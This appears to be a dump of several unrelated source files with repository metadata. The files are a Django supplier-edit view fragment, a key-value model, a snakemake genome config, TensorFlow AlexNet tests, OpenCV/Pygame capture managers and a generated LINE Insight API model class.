numero = request.POST.get('numero')
bairro = request.POST.get('bairro')
cidade = request.POST.get('cidade')
uf_cidade = request.POST.get('uf_cidade')
bloqueado = request.POST.get('bloqueado')
fornecedor_obj.nome = nome
fornecedor_obj.telefone = tel
fornecedor_obj.celular = cel
fornecedor_obj.cpf = cpf
fornecedor_obj.email = mail
fornecedor_obj.endereco = endereco
fornecedor_obj.numero = numero
fornecedor_obj.bairro = bairro
fornecedor_obj.cidade = cidade
fornecedor_obj.uf_cidade = uf_cidade
fornecedor_obj.estado = bloqueado
fornecedor_obj.save()
msg = fornecedor_obj.nome + " editado(a) com sucesso!"
return render(request, 'lavajato_fornecedor/fornecedor_edita.html', {'title':'Editar Fornecedor', 'fornecedor_obj':fornecedor_obj, 'msg':msg})
return render(request, 'lavajato_fornecedor/fornecedor_busca_edita.html', {'title':'Editar Fornecedor', 'fornecedores':fornecedores})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
|
[
"[email protected]"
] | |
005465f20680fb4a6b902a62c9c1f39bd408de7d
|
505b766aeef6dae5fdb2cab9f2550543179e10e9
|
/app/keyvalue/models.py
|
ca70f4fd07e1a6862c13073c71802ea54c71b626
|
[] |
no_license
|
tossedwarrior/wri
|
19b912630d00f64bcccc499ba22418c73c7bf359
|
0d4a0f9d7c36b04f87c7cf0ec42db4a57698137f
|
refs/heads/master
| 2020-12-25T19:27:19.028235 | 2012-06-13T21:03:11 | 2012-06-13T21:03:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 837 |
py
|
# -*- encoding: utf-8 -*-
import os
from datetime import datetime
if 'SERVER_SOFTWARE' in os.environ and os.environ['SERVER_SOFTWARE'].startswith('Dev'):
from django.db import models
class JSONData(models.Model):
json = models.TextField(default='[]')
@staticmethod
def get_by_id(id):
return JSONData.objects.get(pk=id)
def put(self):
self.save()
def unique_id(self):
return self.id
class Error(models.Model):
error = models.TextField(default='')
when = models.DateTimeField(default=datetime.now)
@staticmethod
def track(log):
Error(error=log).save();
@staticmethod
def latest():
return Error.objects.order_by('-when')[:10]
else:
from models_appengine import *
|
[
"[email protected]"
] | |
b548b9f7cdadb399f27f06b74930780a08061e79
|
05d5945350fe64f6c1235d4f12ee22323167ca0c
|
/snakemake/configs/mm10_SRP044873.py
|
d77054f2e20301267d8ba829038dad7ea369643b
|
[
"BSD-2-Clause"
] |
permissive
|
saketkc/re-ribo-smk
|
674d4423830bbae3a32f46146ffd362514047a60
|
c9326cbafdfa060e22e9af692d9146c37f5035ba
|
refs/heads/master
| 2021-07-12T18:46:37.772947 | 2020-05-30T01:41:13 | 2020-05-30T01:41:13 | 148,952,525 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,542 |
py
|
RAWDATA_DIR = '/staging/as/skchoudh/re-ribo-datasets/mm10/SRP044873'
OUT_DIR = '/staging/as/skchoudh/re-ribo-analysis/mm10/SRP044873'
GENOME_FASTA = '/home/cmb-06/as/skchoudh/genomes/mm10/fasta/Mus_musculus.GRCm38.dna.primary_assembly.fa'
CHROM_SIZES = '/home/cmb-06/as/skchoudh/genomes/mm10/fasta/Mus_musculus.GRCm38.dna.primary_assembly.sizes'
STAR_INDEX = '/home/cmb-06/as/skchoudh/genomes/mm10/star_annotated_ribopod'
GTF_VERSION = 'v96'
GTF = '/home/cmb-06/as/skchoudh/genomes/mm10/annotation/Mus_musculus.GRCm38.96.chr_patch_hapl_scaff.gtf'
GENE_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/gene.bed.gz'
STAR_CODON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/start_codon.bed.gz'
STOP_CODON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/stop_codon.bed.gz'
CDS_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/cds.bed.gz'
UTR5_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/utr5.bed.gz'
UTR3_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/utr3.bed.gz'
INTRON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/intron.bed.gz'
ORIENTATIONS = ['5prime', '3prime']
STRANDS = ['pos', 'neg', 'combined']
FRAGMENT_LENGTHS = range(18, 39)
RIBOTRICER_ANNOTATION_PREFIX = '/home/cmb-06/as/skchoudh/genomes/mm10/ribotricer_v96_annotation_longest'
|
[
"[email protected]"
] | |
e73bd41c33e69aa417fab4dffaa549a7814efb51
|
9a73c54526082c27e5c5d88bd54950a589233658
|
/DeepLearning/Verification_code_identification/nets/alexnet_test.py
|
f0dc38b9c9f6f80166eb10b496695e7ac63d676d
|
[
"Apache-2.0"
] |
permissive
|
archu2020/python-2
|
af78b65ed7f3ad17f71d4f8a97c002df86908298
|
19c626ca9fd37168db8a7ac075fd80c8e2971313
|
refs/heads/master
| 2022-12-27T12:08:44.316760 | 2020-10-02T15:46:27 | 2020-10-02T15:46:27 | 300,660,839 | 0 | 0 |
Apache-2.0
| 2020-10-02T15:46:28 | 2020-10-02T15:37:58 |
Python
|
UTF-8
|
Python
| false | false | 5,964 |
py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for slim.nets.alexnet."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from nets import alexnet
slim = tf.contrib.slim
class AlexnetV2Test(tf.test.TestCase):
def testBuild(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs, num_classes)
self.assertEquals(logits.op.name, 'alexnet_v2/fc8/squeezed')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
def testFullyConvolutional(self):
batch_size = 1
height, width = 300, 400
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs, num_classes, spatial_squeeze=False)
self.assertEquals(logits.op.name, 'alexnet_v2/fc8/BiasAdd')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, 4, 7, num_classes])
def testEndPoints(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
_, end_points = alexnet.alexnet_v2(inputs, num_classes)
expected_names = ['alexnet_v2/conv1',
'alexnet_v2/pool1',
'alexnet_v2/conv2',
'alexnet_v2/pool2',
'alexnet_v2/conv3',
'alexnet_v2/conv4',
'alexnet_v2/conv5',
'alexnet_v2/pool5',
'alexnet_v2/fc6',
'alexnet_v2/fc7',
'alexnet_v2/fc8'
]
self.assertSetEqual(set(end_points.keys()), set(expected_names))
def testModelVariables(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
alexnet.alexnet_v2(inputs, num_classes)
expected_names = ['alexnet_v2/conv1/weights',
'alexnet_v2/conv1/biases',
'alexnet_v2/conv2/weights',
'alexnet_v2/conv2/biases',
'alexnet_v2/conv3/weights',
'alexnet_v2/conv3/biases',
'alexnet_v2/conv4/weights',
'alexnet_v2/conv4/biases',
'alexnet_v2/conv5/weights',
'alexnet_v2/conv5/biases',
'alexnet_v2/fc6/weights',
'alexnet_v2/fc6/biases',
'alexnet_v2/fc7/weights',
'alexnet_v2/fc7/biases',
'alexnet_v2/fc8/weights',
'alexnet_v2/fc8/biases',
]
model_variables = [v.op.name for v in slim.get_model_variables()]
self.assertSetEqual(set(model_variables), set(expected_names))
def testEvaluation(self):
batch_size = 2
height, width = 224, 224
num_classes = 1000
with self.test_session():
eval_inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(eval_inputs, is_training=False)
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
predictions = tf.argmax(logits, 1)
self.assertListEqual(predictions.get_shape().as_list(), [batch_size])
def testTrainEvalWithReuse(self):
train_batch_size = 2
eval_batch_size = 1
train_height, train_width = 224, 224
eval_height, eval_width = 300, 400
num_classes = 1000
with self.test_session():
train_inputs = tf.random_uniform(
(train_batch_size, train_height, train_width, 3))
logits, _ = alexnet.alexnet_v2(train_inputs)
self.assertListEqual(logits.get_shape().as_list(),
[train_batch_size, num_classes])
tf.get_variable_scope().reuse_variables()
eval_inputs = tf.random_uniform(
(eval_batch_size, eval_height, eval_width, 3))
logits, _ = alexnet.alexnet_v2(eval_inputs, is_training=False,
spatial_squeeze=False)
self.assertListEqual(logits.get_shape().as_list(),
[eval_batch_size, 4, 7, num_classes])
logits = tf.reduce_mean(logits, [1, 2])
predictions = tf.argmax(logits, 1)
self.assertEquals(predictions.get_shape().as_list(), [eval_batch_size])
def testForward(self):
batch_size = 1
height, width = 224, 224
with self.test_session() as sess:
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs)
sess.run(tf.global_variables_initializer())
output = sess.run(logits)
self.assertTrue(output.any())
if __name__ == '__main__':
  # Run all test cases in this module through the TensorFlow test runner.
  tf.test.main()
|
[
"[email protected]"
] | |
d72ecdd7a3b850a399fcd9116f3c384b38b3d1d6
|
181e9cc9cf4e52fcc6e9979890cc5b41e7beb756
|
/Module 1/06_Codes/06/06_Codes/managers.py
|
c2650fc77fbc09ebd2367a198a7481ec81ec29c4
|
[
"MIT"
] |
permissive
|
PacktPublishing/OpenCV-Computer-Vision-Projects-with-Python
|
ace8576dce8d5f5db6992b3e5880a717996f78cc
|
45a9c695e5bb29fa3354487e52f29a565d700d5c
|
refs/heads/master
| 2023-02-09T14:10:42.767047 | 2023-01-30T09:02:09 | 2023-01-30T09:02:09 | 71,112,659 | 96 | 72 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,862 |
py
|
import cv2
import numpy
import pygame
import time
import utils
class CaptureManager(object):
    """Dispatch frames from a capture object to a preview window and to
    image/video files on request.

    Drive it with one enterFrame()/exitFrame() pair per loop iteration:
    enterFrame() grabs the next frame; exitFrame() retrieves it, updates
    the FPS estimate, draws the preview, writes any pending image/video
    output, and releases the frame.

    NOTE(review): this is Python 2 era code (long(), cv2.cv.* constants);
    it will not run unmodified on Python 3 / OpenCV 3+.
    """
    def __init__(self, capture, previewWindowManager = None,
                 shouldMirrorPreview = False):
        # Optional WindowManager-like object used to preview each frame.
        self.previewWindowManager = previewWindowManager
        # When True, only the preview (not file output) is flipped.
        self.shouldMirrorPreview = shouldMirrorPreview
        self._capture = capture
        self._channel = 0
        self._enteredFrame = False  # True between enterFrame() and exitFrame()
        self._frame = None          # lazily retrieved, cached frame
        self._imageFilename = None  # pending one-shot image write, if any
        self._videoFilename = None  # destination of in-progress recording
        self._videoEncoding = None
        self._videoWriter = None
        # FPS bookkeeping, used when the capture cannot report its own FPS.
        self._startTime = None
        self._framesElapsed = long(0)
        self._fpsEstimate = None
    @property
    def channel(self):
        # Capture channel forwarded to retrieve() (for multi-head cameras).
        return self._channel
    @channel.setter
    def channel(self, value):
        if self._channel != value:
            self._channel = value
            # Invalidate the cached frame: it belongs to the old channel.
            self._frame = None
    @property
    def frame(self):
        """The current frame, retrieved lazily after enterFrame()."""
        if self._enteredFrame and self._frame is None:
            # NOTE(review): 'channel' is a keyword of the legacy cv2 API;
            # modern VideoCapture.retrieve() names this parameter 'flag'.
            _, self._frame = self._capture.retrieve(channel = self.channel)
        return self._frame
    @property
    def isWritingImage(self):
        # True while a writeImage() request has not yet been fulfilled.
        return self._imageFilename is not None
    @property
    def isWritingVideo(self):
        # True between startWritingVideo() and stopWritingVideo().
        return self._videoFilename is not None
    def enterFrame(self):
        """Capture the next frame, if any."""
        # But first, check that any previous frame was exited.
        assert not self._enteredFrame, \
            'previous enterFrame() had no matching exitFrame()'
        if self._capture is not None:
            # grab() is cheap; the actual decode happens in retrieve().
            self._enteredFrame = self._capture.grab()
    def exitFrame(self):
        """Draw to the window. Write to files. Release the frame."""
        # Check whether any grabbed frame is retrievable.
        # The getter may retrieve and cache the frame.
        if self.frame is None:
            self._enteredFrame = False
            return
        # Update the FPS estimate and related variables.
        if self._framesElapsed == 0:
            self._startTime = time.time()
        else:
            timeElapsed = time.time() - self._startTime
            self._fpsEstimate = self._framesElapsed / timeElapsed
        self._framesElapsed += 1
        # Draw to the window, if any (mirrored preview gets a copy so the
        # original frame written to files is left untouched).
        if self.previewWindowManager is not None:
            if self.shouldMirrorPreview:
                mirroredFrame = numpy.fliplr(self._frame).copy()
                self.previewWindowManager.show(mirroredFrame)
            else:
                self.previewWindowManager.show(self._frame)
        # Write to the image file, if any (one-shot: clear the request).
        if self.isWritingImage:
            cv2.imwrite(self._imageFilename, self._frame)
            self._imageFilename = None
        # Write to the video file, if any.
        self._writeVideoFrame()
        # Release the frame.
        self._frame = None
        self._enteredFrame = False
    def writeImage(self, filename):
        """Write the next exited frame to an image file."""
        self._imageFilename = filename
    def startWritingVideo(
            self, filename,
            encoding = cv2.cv.CV_FOURCC('I','4','2','0')):
        """Start writing exited frames to a video file."""
        # The writer itself is created lazily in _writeVideoFrame(), once
        # a usable FPS value is known.
        self._videoFilename = filename
        self._videoEncoding = encoding
    def stopWritingVideo(self):
        """Stop writing exited frames to a video file."""
        self._videoFilename = None
        self._videoEncoding = None
        self._videoWriter = None
    def _writeVideoFrame(self):
        # Append the current frame to the video file, creating the writer
        # on first use.
        if not self.isWritingVideo:
            return
        if self._videoWriter is None:
            fps = self._capture.get(cv2.cv.CV_CAP_PROP_FPS)
            if fps == 0.0:
                # The capture's FPS is unknown so use an estimate.
                if self._framesElapsed < 20:
                    # Wait until more frames elapse so that the
                    # estimate is more stable.
                    return
                else:
                    fps = self._fpsEstimate
            size = (int(self._capture.get(
                        cv2.cv.CV_CAP_PROP_FRAME_WIDTH)),
                    int(self._capture.get(
                        cv2.cv.CV_CAP_PROP_FRAME_HEIGHT)))
            self._videoWriter = cv2.VideoWriter(
                self._videoFilename, self._videoEncoding,
                fps, size)
        self._videoWriter.write(self._frame)
class WindowManager(object):
def __init__(self, windowName, keypressCallback = None):
self.keypressCallback = keypressCallback
self._windowName = windowName
self._isWindowCreated = False
@property
def isWindowCreated(self):
return self._isWindowCreated
def createWindow(self):
cv2.namedWindow(self._windowName)
self._isWindowCreated = True
def show(self, frame):
cv2.imshow(self._windowName, frame)
def destroyWindow(self):
cv2.destroyWindow(self._windowName)
self._isWindowCreated = False
def processEvents(self):
keycode = cv2.waitKey(1)
if self.keypressCallback is not None and keycode != -1:
# Discard any non-ASCII info encoded by GTK.
keycode &= 0xFF
self.keypressCallback(keycode)
class PygameWindowManager(WindowManager):
    """WindowManager variant backed by a Pygame display instead of cv2.imshow."""
    def createWindow(self):
        """Initialize the Pygame display and set the window caption."""
        pygame.display.init()
        pygame.display.set_caption(self._windowName)
        self._isWindowCreated = True
    def show(self, frame):
        """Convert the BGR/gray frame to RGB and blit it to the display."""
        # Pygame wants (w, h) dimensions, i.e. the frame shape reversed.
        frameSize = frame.shape[1::-1]
        # Pygame also requires RGB pixel order.
        if utils.isGray(frame):
            conversion = cv2.COLOR_GRAY2RGB
        else:
            conversion = cv2.COLOR_BGR2RGB
        rgb = cv2.cvtColor(frame, conversion)
        # Wrap the raw pixels in a Pygame Surface.
        surface = pygame.image.frombuffer(
            rgb.tostring(), frameSize, 'RGB')
        # (Re)size the window to match the frame, then draw and present.
        screen = pygame.display.set_mode(frameSize)
        screen.blit(surface, (0, 0))
        pygame.display.flip()
    def destroyWindow(self):
        """Shut down the Pygame display."""
        pygame.display.quit()
        self._isWindowCreated = False
    def processEvents(self):
        """Drain the Pygame event queue, dispatching keypresses and quit."""
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                # Stop processing further events once the window is gone.
                self.destroyWindow()
                return
            if event.type == pygame.KEYDOWN and \
                    self.keypressCallback is not None:
                self.keypressCallback(event.key)
|
[
"[email protected]"
] | |
549d26bdfebb26f7e41ffa553e48b04e054ae011
|
5e255ad1360c90478393744586663741a9569c21
|
/linebot/v3/insight/models/get_statistics_per_unit_response_overview.py
|
8dead06a2e9bdba632aa7f0ff33642dfff6804fd
|
[
"Apache-2.0"
] |
permissive
|
line/line-bot-sdk-python
|
d76268e8b542060d6eccbacc5dbfab16960ecc35
|
cffd35948238ae24982173e30b1ea1e595bbefd9
|
refs/heads/master
| 2023-08-31T22:12:31.698183 | 2023-08-28T01:10:09 | 2023-08-28T01:10:09 | 70,553,423 | 1,898 | 1,181 |
Apache-2.0
| 2023-09-11T05:14:07 | 2016-10-11T03:42:26 |
Python
|
UTF-8
|
Python
| false | false | 4,122 |
py
|
# coding: utf-8
"""
LINE Messaging API(Insight)
This document describes LINE Messaging API(Insight). # noqa: E501
The version of the OpenAPI document: 0.0.1
Generated by OpenAPI Generator (https://openapi-generator.tech)
Do not edit the class manually.
"""
from __future__ import annotations
import pprint
import re # noqa: F401
import json
from typing import Optional
from pydantic.v1 import BaseModel, Field, StrictInt
class GetStatisticsPerUnitResponseOverview(BaseModel):
    """
    Statistics related to messages.
    https://developers.line.biz/en/reference/messaging-api/#get-statistics-per-unit-response
    """
    unique_impression: Optional[StrictInt] = Field(None, alias="uniqueImpression", description="Number of users who opened the message, meaning they displayed at least 1 bubble.")
    unique_click: Optional[StrictInt] = Field(None, alias="uniqueClick", description="Number of users who opened any URL in the message.")
    unique_media_played: Optional[StrictInt] = Field(None, alias="uniqueMediaPlayed", description="Number of users who started playing any video or audio in the message.")
    unique_media_played100_percent: Optional[StrictInt] = Field(None, alias="uniqueMediaPlayed100Percent", description="Number of users who played the entirety of any video or audio in the message.")
    __properties = ["uniqueImpression", "uniqueClick", "uniqueMediaPlayed", "uniqueMediaPlayed100Percent"]

    class Config:
        """Pydantic configuration"""
        allow_population_by_field_name = True
        validate_assignment = True

    def to_str(self) -> str:
        """Return the string representation of the model using alias."""
        return pprint.pformat(self.dict(by_alias=True))

    def to_json(self) -> str:
        """Return the JSON representation of the model using alias."""
        return json.dumps(self.to_dict())

    @classmethod
    def from_json(cls, json_str: str) -> GetStatisticsPerUnitResponseOverview:
        """Create an instance of GetStatisticsPerUnitResponseOverview from a JSON string."""
        return cls.from_dict(json.loads(json_str))

    def to_dict(self):
        """Return the dictionary representation of the model using alias."""
        _dict = self.dict(by_alias=True,
                          exclude={
                          },
                          exclude_none=True)
        # Every field is nullable: when a field was explicitly set to None,
        # re-insert an explicit None under its camelCase alias (exclude_none
        # dropped it from the dict built above).
        for name, alias in (
                ("unique_impression", "uniqueImpression"),
                ("unique_click", "uniqueClick"),
                ("unique_media_played", "uniqueMediaPlayed"),
                ("unique_media_played100_percent", "uniqueMediaPlayed100Percent")):
            if getattr(self, name) is None and name in self.__fields_set__:
                _dict[alias] = None
        return _dict

    @classmethod
    def from_dict(cls, obj: dict) -> GetStatisticsPerUnitResponseOverview:
        """Create an instance of GetStatisticsPerUnitResponseOverview from a dict."""
        if obj is None:
            return None
        if not isinstance(obj, dict):
            # Let pydantic attempt coercion of non-dict inputs directly.
            return GetStatisticsPerUnitResponseOverview.parse_obj(obj)
        return GetStatisticsPerUnitResponseOverview.parse_obj({
            "unique_impression": obj.get("uniqueImpression"),
            "unique_click": obj.get("uniqueClick"),
            "unique_media_played": obj.get("uniqueMediaPlayed"),
            "unique_media_played100_percent": obj.get("uniqueMediaPlayed100Percent")
        })
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.